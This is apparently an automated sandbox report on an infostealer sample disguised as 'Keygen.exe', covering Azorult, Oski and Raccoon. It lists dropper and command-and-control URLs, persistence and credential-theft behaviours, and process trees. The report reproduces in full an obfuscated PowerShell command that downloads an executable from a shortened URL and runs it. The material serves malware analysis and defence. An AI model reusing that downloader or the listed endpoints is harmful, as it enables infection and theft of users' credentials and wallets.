azorult | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
300s
max time network
301s
platform
windows10_x64
resource
win10-en-20211104
submitted
12-11-2021 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe
Size

849KB
MD5

dbde61502c5c0e17ebc6919f361c32b9
SHA1

189749cf0b66a9f560b68861f98c22cdbcafc566
SHA256

88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b
SHA512

d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb

Score

10^/10

azorult oski raccoon 32365171a31c4583d6e3b7aad1690e41cefc38eb collection discovery infostealer persistence spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Family

raccoon

Botnet

32365171a31c4583d6e3b7aad1690e41cefc38eb

Attributes

url4cnc
http://telegalive.top/brikitiki
http://toptelete.top/brikitiki
http://telegraf.top/brikitiki
https://t.me/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

oski

colonna.ac.ug

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 4892 created 4848 4892 WerFault.exe qdt.exe
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

26 1768 powershell.exe
27 1536 powershell.exe
28 2012 powershell.exe
33 1536 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 4892 created 4848	4892	WerFault.exe	qdt.exe

flow	pid	process
26	1768	powershell.exe
27	1536	powershell.exe
28	2012	powershell.exe
33	1536	powershell.exe

Executes dropped EXE 24 IoCs

Processes:

Keygen.exesko.exeqdt.exeyfu.execdvcxsdme.exevbndfgame.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeqdt.exesko.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.execc.exepm.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exeaspnet_compiler.execc.exeyfu.exevbndfgame.execdvcxsdme.exe

pid	process
3920	Keygen.exe
4156	sko.exe
4212	qdt.exe
4300	yfu.exe
4404	cdvcxsdme.exe
4428	vbndfgame.exe
4824	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4848	qdt.exe
4884	sko.exe
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
2344	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4296	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
3204	Dxndvkhrxwosconsoleapp14.exe
3628	Dxndvkhrxwosconsoleapp14.exe
4184	cc.exe
4484	pm.exe
4596	Dxndvkhrxwosconsoleapp14.exe
4616	Dxndvkhrxwosconsoleapp14.exe
5040	aspnet_compiler.exe
1556	cc.exe
1760	yfu.exe
1272	vbndfgame.exe
2404	cdvcxsdme.exe

Loads dropped DLL 10 IoCs

Processes:

Uxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exevbndfgame.exe

pid	process
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4596	Dxndvkhrxwosconsoleapp14.exe
4596	Dxndvkhrxwosconsoleapp14.exe
4596	Dxndvkhrxwosconsoleapp14.exe
1272	vbndfgame.exe
1272	vbndfgame.exe
1272	vbndfgame.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

pm.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\winda = "\"C:\\Users\\Admin\\AppData\\Roaming\\winda.exe\""	pm.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 11 IoCs

Processes:

qdt.exesko.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exepm.execc.exeyfu.exevbndfgame.execdvcxsdme.exe

description	pid	process	target process
PID 4212 set thread context of 4848	4212	qdt.exe	qdt.exe
PID 4156 set thread context of 4884	4156	sko.exe	sko.exe
PID 4824 set thread context of 2020	4824	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
PID 4836 set thread context of 4296	4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
PID 3204 set thread context of 4596	3204	Dxndvkhrxwosconsoleapp14.exe	Dxndvkhrxwosconsoleapp14.exe
PID 3628 set thread context of 4616	3628	Dxndvkhrxwosconsoleapp14.exe	Dxndvkhrxwosconsoleapp14.exe
PID 4484 set thread context of 5040	4484	pm.exe	aspnet_compiler.exe
PID 4184 set thread context of 1556	4184	cc.exe	cc.exe
PID 4300 set thread context of 1760	4300	yfu.exe	yfu.exe
PID 4428 set thread context of 1272	4428	vbndfgame.exe	vbndfgame.exe
PID 4404 set thread context of 2404	4404	cdvcxsdme.exe	cdvcxsdme.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4820 4616 WerFault.exe Dxndvkhrxwosconsoleapp14.exe
4892 4848 WerFault.exe qdt.exe

pid	pid_target	process	target process
4820	4616	WerFault.exe	Dxndvkhrxwosconsoleapp14.exe
4892	4848	WerFault.exe	qdt.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

vbndfgame.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vbndfgame.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Dxndvkhrxwosconsoleapp14.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4272 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

596 timeout.exe
4564 timeout.exe
1576 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4996 taskkill.exe
3840 taskkill.exe

pid	process
4272	schtasks.exe

pid	process
596	timeout.exe
4564	timeout.exe
1576	timeout.exe

pid	process
4996	taskkill.exe
3840	taskkill.exe

Modifies registry class 5 IoCs

Processes:

qdt.exesko.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	qdt.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	sko.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	cmd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

cc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	cc.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	cc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesko.exeqdt.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exepm.exeWerFault.exeWerFault.exe

pid	process
1536	powershell.exe
1264	powershell.exe
1508	powershell.exe
2012	powershell.exe
2344	powershell.exe
1768	powershell.exe
1264	powershell.exe
2344	powershell.exe
1768	powershell.exe
1508	powershell.exe
1536	powershell.exe
2012	powershell.exe
2344	powershell.exe
1264	powershell.exe
2012	powershell.exe
1768	powershell.exe
1508	powershell.exe
1536	powershell.exe
4156	sko.exe
4212	qdt.exe
4212	qdt.exe
4212	qdt.exe
4156	sko.exe
4156	sko.exe
4824	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4824	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4824	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
3204	Dxndvkhrxwosconsoleapp14.exe
3628	Dxndvkhrxwosconsoleapp14.exe
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
2020	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4484	pm.exe
3204	Dxndvkhrxwosconsoleapp14.exe
3204	Dxndvkhrxwosconsoleapp14.exe
3628	Dxndvkhrxwosconsoleapp14.exe
3628	Dxndvkhrxwosconsoleapp14.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4820	WerFault.exe
4484	pm.exe
4484	pm.exe
4892	WerFault.exe
4892	WerFault.exe
4892	WerFault.exe
4892	WerFault.exe
4892	WerFault.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

yfu.exevbndfgame.execdvcxsdme.exe

pid process

4300 yfu.exe
4428 vbndfgame.exe
4404 cdvcxsdme.exe

pid	process
4300	yfu.exe
4428	vbndfgame.exe
4404	cdvcxsdme.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesko.exeqdt.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exepm.exeWerFault.exetaskkill.exeWerFault.exeaspnet_compiler.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4156	sko.exe
Token: SeDebugPrivilege	4212	qdt.exe
Token: SeDebugPrivilege	4824	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Token: SeDebugPrivilege	4836	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Token: SeDebugPrivilege	3204	Dxndvkhrxwosconsoleapp14.exe
Token: SeDebugPrivilege	3628	Dxndvkhrxwosconsoleapp14.exe
Token: SeDebugPrivilege	4484	pm.exe
Token: SeRestorePrivilege	4820	WerFault.exe
Token: SeBackupPrivilege	4820	WerFault.exe
Token: SeDebugPrivilege	4820	WerFault.exe
Token: SeDebugPrivilege	4996	taskkill.exe
Token: SeDebugPrivilege	4892	WerFault.exe
Token: SeDebugPrivilege	5040	aspnet_compiler.exe
Token: SeDebugPrivilege	3840	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Keygen.exeyfu.execdvcxsdme.exevbndfgame.exe

pid process

3920 Keygen.exe
4300 yfu.exe
4404 cdvcxsdme.exe
4428 vbndfgame.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exepowershell.exeyfu.exeqdt.exe

description	pid	process	target process
PID 1016 wrote to memory of 4020	1016	Keygen.exe	cmd.exe
PID 1016 wrote to memory of 4020	1016	Keygen.exe	cmd.exe
PID 1016 wrote to memory of 4020	1016	Keygen.exe	cmd.exe
PID 4020 wrote to memory of 3920	4020	cmd.exe	Keygen.exe
PID 4020 wrote to memory of 3920	4020	cmd.exe	Keygen.exe
PID 4020 wrote to memory of 3920	4020	cmd.exe	Keygen.exe
PID 4020 wrote to memory of 3556	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 3556	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 3556	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1584	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1584	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1584	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1576	4020	cmd.exe	timeout.exe
PID 4020 wrote to memory of 1576	4020	cmd.exe	timeout.exe
PID 4020 wrote to memory of 1576	4020	cmd.exe	timeout.exe
PID 4020 wrote to memory of 396	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 396	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 396	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 400	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 400	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 400	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 596	4020	cmd.exe	timeout.exe
PID 4020 wrote to memory of 596	4020	cmd.exe	timeout.exe
PID 4020 wrote to memory of 596	4020	cmd.exe	timeout.exe
PID 4020 wrote to memory of 344	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 344	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 344	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1912	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1912	4020	cmd.exe	mshta.exe
PID 4020 wrote to memory of 1912	4020	cmd.exe	mshta.exe
PID 1912 wrote to memory of 1264	1912	mshta.exe	powershell.exe
PID 1912 wrote to memory of 1264	1912	mshta.exe	powershell.exe
PID 1912 wrote to memory of 1264	1912	mshta.exe	powershell.exe
PID 396 wrote to memory of 2344	396	mshta.exe	powershell.exe
PID 396 wrote to memory of 2344	396	mshta.exe	powershell.exe
PID 396 wrote to memory of 2344	396	mshta.exe	powershell.exe
PID 3556 wrote to memory of 1536	3556	mshta.exe	powershell.exe
PID 3556 wrote to memory of 1536	3556	mshta.exe	powershell.exe
PID 3556 wrote to memory of 1536	3556	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1508	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1508	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1508	1584	mshta.exe	powershell.exe
PID 344 wrote to memory of 2012	344	mshta.exe	powershell.exe
PID 344 wrote to memory of 2012	344	mshta.exe	powershell.exe
PID 344 wrote to memory of 2012	344	mshta.exe	powershell.exe
PID 400 wrote to memory of 1768	400	mshta.exe	powershell.exe
PID 400 wrote to memory of 1768	400	mshta.exe	powershell.exe
PID 400 wrote to memory of 1768	400	mshta.exe	powershell.exe
PID 1768 wrote to memory of 4156	1768	powershell.exe	sko.exe
PID 1768 wrote to memory of 4156	1768	powershell.exe	sko.exe
PID 1768 wrote to memory of 4156	1768	powershell.exe	sko.exe
PID 2344 wrote to memory of 4212	2344	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	qdt.exe
PID 2344 wrote to memory of 4212	2344	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	qdt.exe
PID 2344 wrote to memory of 4212	2344	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	qdt.exe
PID 1536 wrote to memory of 4300	1536	powershell.exe	yfu.exe
PID 1536 wrote to memory of 4300	1536	powershell.exe	yfu.exe
PID 1536 wrote to memory of 4300	1536	powershell.exe	yfu.exe
PID 4300 wrote to memory of 4404	4300	yfu.exe	cdvcxsdme.exe
PID 4300 wrote to memory of 4404	4300	yfu.exe	cdvcxsdme.exe
PID 4300 wrote to memory of 4404	4300	yfu.exe	cdvcxsdme.exe
PID 4300 wrote to memory of 4428	4300	yfu.exe	vbndfgame.exe
PID 4300 wrote to memory of 4428	4300	yfu.exe	vbndfgame.exe
PID 4300 wrote to memory of 4428	4300	yfu.exe	vbndfgame.exe
PID 4212 wrote to memory of 4692	4212	qdt.exe	WScript.exe

outlook_office_path 1 IoCs

Processes:

Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

outlook_win_path 1 IoCs

Processes:

Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\60C9.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4020

C:\Users\Admin\AppData\Local\Temp\60C9.tmp\Keygen.exe
Keygen.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3920

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Public\yfu.exe
"C:\Users\Public\yfu.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4300

C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe
"C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4404

C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe
"C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"
7⤵
- Executes dropped EXE
PID:2404

C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe
"C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4428

C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe
"C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1272

C:\Windows\SysWOW64\cmd.exe
